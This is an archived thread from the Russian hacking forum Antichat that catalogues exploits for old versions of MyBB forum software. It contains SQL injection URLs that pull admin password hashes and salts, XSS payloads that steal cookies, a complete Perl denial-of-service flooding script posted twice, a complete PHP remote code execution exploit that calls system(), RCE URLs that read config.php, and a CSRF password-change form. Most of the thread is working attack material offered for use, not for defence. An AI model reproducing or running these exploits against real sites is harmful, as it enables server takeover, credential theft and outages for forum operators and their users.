Форум АНТИЧАТ - [Обзор уязвимостей myBB]

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - [Обзор уязвимостей myBB] (https://forum.antichat.xyz/showthread.php?t=27777)

[Обзор уязвимостей myBB]

MyBB <= 1.00 RC4
SQL Injection Exploit

Exploit:
http://milw0rm.org/exploits/1022
http://milw0rm.org/exploits/1172

MyBB 1.0.2
Название префикса таблиц

Код:

http://www.example.com/search.php?s=[de1aaf9b]&action=do_search&keywords=a&srchtype=3

MyBB 1.03
SQL-иньекция
[CODE]http://www.example.com/moderation.php?posts=[pid]|

Код:

&tid=[pid]&action=do_multimergeposts&sep=hr

MyBB <= 1.04
SQL-иньекция

Exploit:
http://www.security.nnov.ru/files/mybbex.pl

MyBB <= 1.1.2
SQL-иньекция

Код:

http://www.example.com/index.php?referrer=9999999999'%20UNION%20SELECT%20password,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9%20FROM%20mybb_users%20WHERE%20uid=1/*

MyBB 1.1.2
remote code execution

Exploit:
http://www.security.nnov.ru/files/mybibi.pl

MyBB <= 1.1.3
Create An Admin Exploit

Exploit:
http://milw0rm.org/exploits/1950

MyBB <= 1.1.5
'CLIENT-IP' SQL injection / create new admin exploit
Exploit:
http://www.security.nnov.ru/files/mybbsipsql.php

*************Внимание - Внимание*****************
Уважаемые пользователи, стыд да срам. Впредь флуд в этой теме, а также в подобных темах, будет строго наказываться. Это первое и последнее предупреждение.
*************Внимание - Внимание*****************

*************Attention - Attention*****************
Dear users, shame on you. Flood in this and similar themes will be strictly punished from now. It is last warning
*************Attention - Attention*****************

XSS в Punbb<=1.2.14 & Mybb.ru

XSS в Punbb<=1.2.14 & Mybb.ru

В профиле в поле веб-сайт идет проверка на наличие "http://", и если этой фигни нет, то она автоматически ставится на первое место. Таким образом, код типа:
javascript:{while (true) alert('http:// xss дырка')}
работает.

Единственное что - плохо, что длинна строки ограничена. Но как минимум хороший сниф можно будет всунуть без изврата с аватарми, да и алертами помучить админа. :)

Источник: http://forscripts.moy.su/blog/2007-04-10-40
Пример работы: http://forscripts.3bb.ru/viewtopic.php?pid=9#p9

Цитата:

XSS в Punbb<=1.2.14 & Mybb.ru

В профиле в поле веб-сайт идет проверка на наличие "http://", и если этой фигни нет, то она автоматически ставится на первое место. Таким образом, код типа:
javascript:{while (true) alert('http:// xss дырка')}
работает.

Единственное что - плохо, что длинна строки ограничена. Но как минимум хороший сниф можно будет всунуть без изврата с аватарми, да и алертами помучить админа.

Источник: http://forscripts.moy.su/blog/2007-04-10-40
Пример работы: http://forscripts.3bb.ru/viewtopic.php?pid=9#p9

Есть Open-Source скрипт MyBB - http://mybboard.net, есть уязвимости скрипта MyBB - http://forscripts.net/vulnerability/vul_mybb, а есть бесплатный сервис форумов MyBB - htto://mybb.ru, который мало что сплагиатил скрипт PunBB, так еще и название скрипта. Уязвимости его здесь - http://forscripts.net/vulnerability/vul_punbb, и выше описанная уязвимость касается именно бесплатного сервиса, а не Опен-Саурс скрипта, о котором и идет речь в этой теме. Так что я немного нефтему написал

MyBB Search Denial of Service

Код:

#!/usr/bin/perl

#####################################

# MyBB Search Denial of Service

# Code Written By ZoL64R 

# KamikaZ Security Team 

# ISRAEL

#####################################

use IO::Socket;



$host = $ARGV[0];

$path = $ARGV[1];



if(!$ARGV[1])

{

    print "#################################################\n";

    print "## MyBB Search Denial of Service\n";

    print "## Discoverd By ZoL64R.\n";

    print "#################################################\n";

    print "## [host] [path] \n";

    print "## host.com /mybb\n";

    print "#################################################\n";

    exit();

}

for($i=0; $i<99999; $i++)

{

    $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => "80") or die("[-] Connection faild.\n");

    $post = "action=do_search&keywords=KamikaZ-Team&postthread=1&author=&matchusername=1&forums%5B%5D=all&findthreadst=1&numreplies=&postdate=0&pddir=1&sortby=lastpost&sorder=desc&showresults=threads&submit=Search";

    $pack.= "POST " .$path. "/search.php HTTP/1.1\r\n";

    $pack.= "Host: " .$host. "\r\n";

    $pack.= "User-Agent: Googlebot/2.1\r\n";

    $pack.= "Content-Type: application/x-www-form-urlencoded\r\n";

    $pack.= "Content-Length: " .length($post). "\r\n\r\n";

    $pack.= $post;

    print $socket $pack;

    syswrite STDOUT, "+";

}

Mybb Hot Editor Plugin Local File Inclusion (keyboard.php)

MyBB Search Denial of Service:

Код:

#!/usr/bin/perl

#####################################

# MyBB Search Denial of Service

# Code Written By ZoL64R 

# KamikaZ Security Team 

# ISRAEL

#####################################

use IO::Socket;



$host = $ARGV[0];

$path = $ARGV[1];



if(!$ARGV[1])

{

    print "#################################################\n";

    print "## MyBB Search Denial of Service\n";

    print "## Discoverd By ZoL64R.\n";

    print "#################################################\n";

    print "## [host] [path] \n";

    print "## host.com /mybb\n";

    print "#################################################\n";

    exit();

}

for($i=0; $i<99999; $i++)

{

    $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => "80") or die("[-] Connection faild.\n");

    $post = "action=do_search&keywords=KamikaZ-Team&postthread=1&author=&matchusername=1&forums%5B%5D=all&findthreadst=1&numreplies=&postdate=0&pddir=1&sortby=lastpost&sorder=desc&showresults=threads&submit=Search";

    $pack.= "POST " .$path. "/search.php HTTP/1.1\r\n";

    $pack.= "Host: " .$host. "\r\n";

    $pack.= "User-Agent: Googlebot/2.1\r\n";

    $pack.= "Content-Type: application/x-www-form-urlencoded\r\n";

    $pack.= "Content-Length: " .length($post). "\r\n\r\n";

    $pack.= $post;

    print $socket $pack;

    syswrite STDOUT, "+";

}

Mybb Change Password Vulnerability

Код:

<form action="http://website/mybb_dir/member.php?debug=1"; method="post">

<table border="0" cellspacing="1" cellpadding="4" class="tborder">

<tr>

<td class="trow1" width="40%"><strong>Email Address:</strong></td>

<td class="trow1" width="60%"><input type="text" class="textbox" name="email" /></td>

</tr>

<tr><td wlign=center>

<input type="hidden" name="action" value="do_lostpw" />

<input type="submit" class="button" value="Enter Here" />

</td></tr>

</table>

</form>

Cross site scripting vulnerabilities:

http://target/mybb/archive/index.php/forum-4.html?GLOBALS[]=1&navbits[][name]=33&navbits[][name]=<script>alert(document.cookie);</script>

1.2
inc/generic_error.php?message=<script>alert(document.c ookie);</script>
inc/generic_error.php?message=1&code=<script>alert(doc ument.cookie);</script>

1.1.7
/admin/index.php/”><script>alert(1)</script>

Cross-Site Request Forgery and Cross-Site Scripting (private.php)

Код:

First of all user must be REGISTERED and authorized

- Go to http://target/mybbpath/private.php

- Inster your xss code for Subject

'Avatar URL' XSS Vulnerability

Код:

javasc ript:alert(123)

Full path disclosure:

inc/plugins/hello.php
inc/generic_error.php?message=1
inc/datahandlers/event.php
inc/datahandlers/pm.php
inc/datahandlers/post.php
inc/datahandlers/user.php

1.2.4
http://[TARGET]/[mybb-directory]/member.php?action[]=registe
http://[TARGET]/[mybb-directory]/inc/datahandlers/event.php
http://[TARGET]/[mybb-directory]/captcha.php?imagehash[]=123

MyBulletinBoard (MyBB) <= 1.2.10 Remote Code Execution Exploit

Код:

#!/usr/bin/php -q -d short_open_tag=on

<?php



// magic_quotes_gpc needs to be off



error_reporting(0);

ini_set("max_execution_time",0);

ini_set("default_socket_timeout",5);



if ($argc<5) {

print "-------------------------------------------------------------------------\r\n";

print "                 MyBB <= 1.2.10 Remote Code Execution Exploit\r\n";

print "-------------------------------------------------------------------------\r\n";

print "Usage: w4ck1ng_mybb.php [HOST] [PATH] [FORUM_ID] [COMMAND]\r\n\r\n";

print "[HOST]           = Target server's hostname or ip address\r\n";

print "[PATH]           = Path where MyBB is located\r\n";

print "[FORUM_ID] = Valid forum ID\r\n";

print "[COMMAND]  = Command to execute\r\n\r\n";

print "e.g. w4ck1ng_mybb.php victim.com /mybb/ 1 id\r\n";

print "-------------------------------------------------------------------------\r\n";

print "                             http://www.w4ck1ng.com\r\n";

print "                                    ...Silentz\r\n";

print "-------------------------------------------------------------------------\r\n";

die;

}



//Props to rgod for the following functions



$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacketii($packet)

{

  global $proxy, $host, $port, $html, $proxy_regex;

  if ($proxy=='') {

    $ock=fsockopen(gethostbyname($host),$port);

    if (!$ock) {

      echo 'No response from '.$host.':'.$port; die;

    }

  }

  else {

        $c = preg_match($proxy_regex,$proxy);

    if (!$c) {

      echo 'Not a valid proxy...';die;

    }

    $parts=explode(':',$proxy);

    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";

    $ock=fsockopen($parts[0],$parts[1]);

    if (!$ock) {

      echo 'No response from proxy...';die;

        }

  }

  fputs($ock,$packet);

  if ($proxy=='') {

    $html='';

    while (!feof($ock)) {

      $html.=fgets($ock);

    }

  }

  else {

    $html='';

    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {

      $html.=fread($ock,1);

    }

  }

  fclose($ock);

}



function make_seed()

{

   list($usec, $sec) = explode(' ', microtime());

   return (float) $sec + ((float) $usec * 100000);

}



$host = $argv[1];

$path = $argv[2];

$fid  = $argv[3];

$cmd  = $argv[4];

$cmd  = urlencode($cmd);

$port=80;$proxy="";



if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}

if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}



    $sql = "forumdisplay.php?fid=$fid&sortby=']=1;echo%20'*';%20system('$cmd');echo%20'*';%20\$orderarrow['";

    $packet ="GET " . $path . $sql . " HTTP/1.1\r\n";

    $packet.="Host: ".$host."\r\n";

    $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727;)\r\n";

    $packet.="Connection: Close\r\n\r\n";

    sendpacketii($packet);



     $temp=explode("*",$html);

     $temp2=explode("*",$temp[1]);



    print "-------------------------------------------------------------------------\r\n";

    print "                MyBB <= 1.2.10 Remote Code Execution Exploit\r\n";    

    print "-------------------------------------------------------------------------\r\n";

    echo  $temp2[0];

    print "-------------------------------------------------------------------------\r\n";

    print "                          http://www.w4ck1ng.com\r\n";

    print "                                 ...Silentz\r\n";

    print "-------------------------------------------------------------------------\r\n";





?>



# milw0rm.com [2008-01-16]

MyBulletinBoard (MyBB) <= 1.2.10 Multiple Remote Vulnerabilities

1. Remote Code Execution in "forumdisplay.php":

Код:

http://localhost/mybb.1.2.10/forumdisplay.php?fid=2&sortby='

Example attacks:

Код:

http://localhost/mybb.1.2.10/forumdisplay.php?fid=2

&sortby='];phpinfo();exit;//

http://localhost/mybb.1.2.10/forumdisplay.php?fid=2

&sortby='];system('ls');exit;//

http://localhost/mybb.1.2.10/forumdisplay.php?fid=2

&sortby='];readfile('inc/config.php');exit;//

2. Remote Code Execution in "search.php":

Код:

http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here]

&sortby='

Example attacks:

Код:

http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here]

&sortby='];phpinfo();exit;//

http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here]

&sortby='];system('ls');exit;//

http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here]

&sortby='];readfile('inc/config.php');exit;//

Multy vuln MyBB (formerly MyBulletinBoard) 1.x

MyBB (formerly MyBulletinBoard) 1.x

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий и произвольные SQL команды в базе данных приложения.

1) Уязвимость существует из-за недостаточной обработки входных данных в параметре "sortby" в forumdisplay.php и search.php (когда "action" установлен в значение "results") перед использованием в вызове "eval()". Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе. Успешное эксплуатирование уязвимости требует включение знание валидных значений "fid" для forumdisplay.php и значений "sid" для search.php.

2) Уязвимость существует из-за недостаточной обработки входных данных в параметре массива "mergepost" (когда "action" установлен в значение "do_mergeposts"), "rid" (когда "action" установлен в "allreports"), и "threads" (когда "action" установлен в "do_multimovethreads") в moderation.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Успешное эксплуатирование уязвимости требует наличие учетных данных модератора.

3) Уязвимость существует из-за недостаточной обработки входных данных в параметре "request" и "gid" в admin/usergroups.php (когда "action" установлен в значение "do_joinrequests"). Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Успешное эксплуатирование уязвимости требует наличие учетных данных администратора.

Multiple Sql Injections in MyBB 1.2.10

SQL Injection in "moderation.php" action "do_mergeposts"

Vulnerable: 1.2.10

Для успешной реализации уязвимости необходимы привилегии модератора, в частности, действие "do_mergeposts"
Далее "waraxe"- имя админа

PoC:

Код:

http://localhost/mybb.1.2.10/moderation.php?fid=2&action=do_mergeposts 

&mergepost[war]=1&mergepost[axe]=2

Видим ошибку:

Код:

MySQL error: 1054 

Unknown column 'war' in 'where clause' 

Query: SELECT p.pid, p.uid, p.fid, p.tid, p.visible, p.message, f.usepostcounts 

FROM mybb_posts p LEFT JOIN mybb_forums f ON (f.fid=p.fid) 

WHERE p.tid='0' AND p.pid IN(war,axe) ORDER BY dateline ASC

Из ошибки узнаем префикс таблицы mybb_ - он может отличаться

Exploit:

Код:

http://localhost/mybb.1.2.10/moderation.php?fid=2&action=do_mergeposts 

&mergepost[-1]=1&mergepost[-2)UNION+ALL+SELECT+1,2,3,4,1,6,

7+UNION+ALL+SELECT+1, 

(SELECT+CONCAT(0x5e,username,0x5e,password,0x5e,salt,0x5e,0x27) 

+FROM+mybb_users+LIMIT+0,1),3,4,1,6,7/*]=2

Ошибка:

Код:

MySQL error: 1064 

You have an error in your SQL syntax; check the manual that corresponds to 

your MySQL server version for the right syntax to use near ... line 1 

Query: UPDATE mybb_users SET postnum=postnum-1 

WHERE uid='^waraxe^aff3fcfc70d2a50c3d4c2158233c3901^C5ybEW6b^''

waraxe - имя админа
aff3fcfc70d2a50c3d4c2158233c3901 - хэш пароля
C5ybEW6b - соль

SQL Injection in "moderation.php" action "allreports"

Для успешной реализации уязвимости необходимы привилегии модератора

PoC:

Код:

http://localhost/mybb.1.2.10/moderation.

php?fid=2&action=allreports&rid=0' 

+UNION+SELECT+waraxe--+

Ошибка:

Код:

MySQL error: 1054 

Unknown column 'waraxe' in 'field list' 

Query: SELECT COUNT(rid) AS count FROM mybb_reportedposts WHERE 

rid <= '0' UNION SELECT waraxe-- '

Ошибка используется для выяснения префикса таблицы и далее используется для повышения привилегий от модератора до администратора, аналогично первому примеру.

SQL Injection in "moderation.php" action "do_multimovethreads"

Для успешной реализации уязвимости необходимы привилегии модератора, в частности, действие "canmanagethreads"

PoC:

Код:

http://localhost/mybb.1.2.10/moderation.

php?fid=2&action=do_multimovethreads 

&moveto=2&threads=war|axe

Ошибка:

Код:

MySQL error: 1054 

Unknown column 'war' in 'where clause' 

Query: SELECT fid, visible, replies, unapprovedposts FROM mybb_threads 

WHERE tid IN (war,axe)

Ошибка используется для выяснения префикса таблицы и далее используется для повышения привилегий от модератора до администратора, аналогично первому примеру.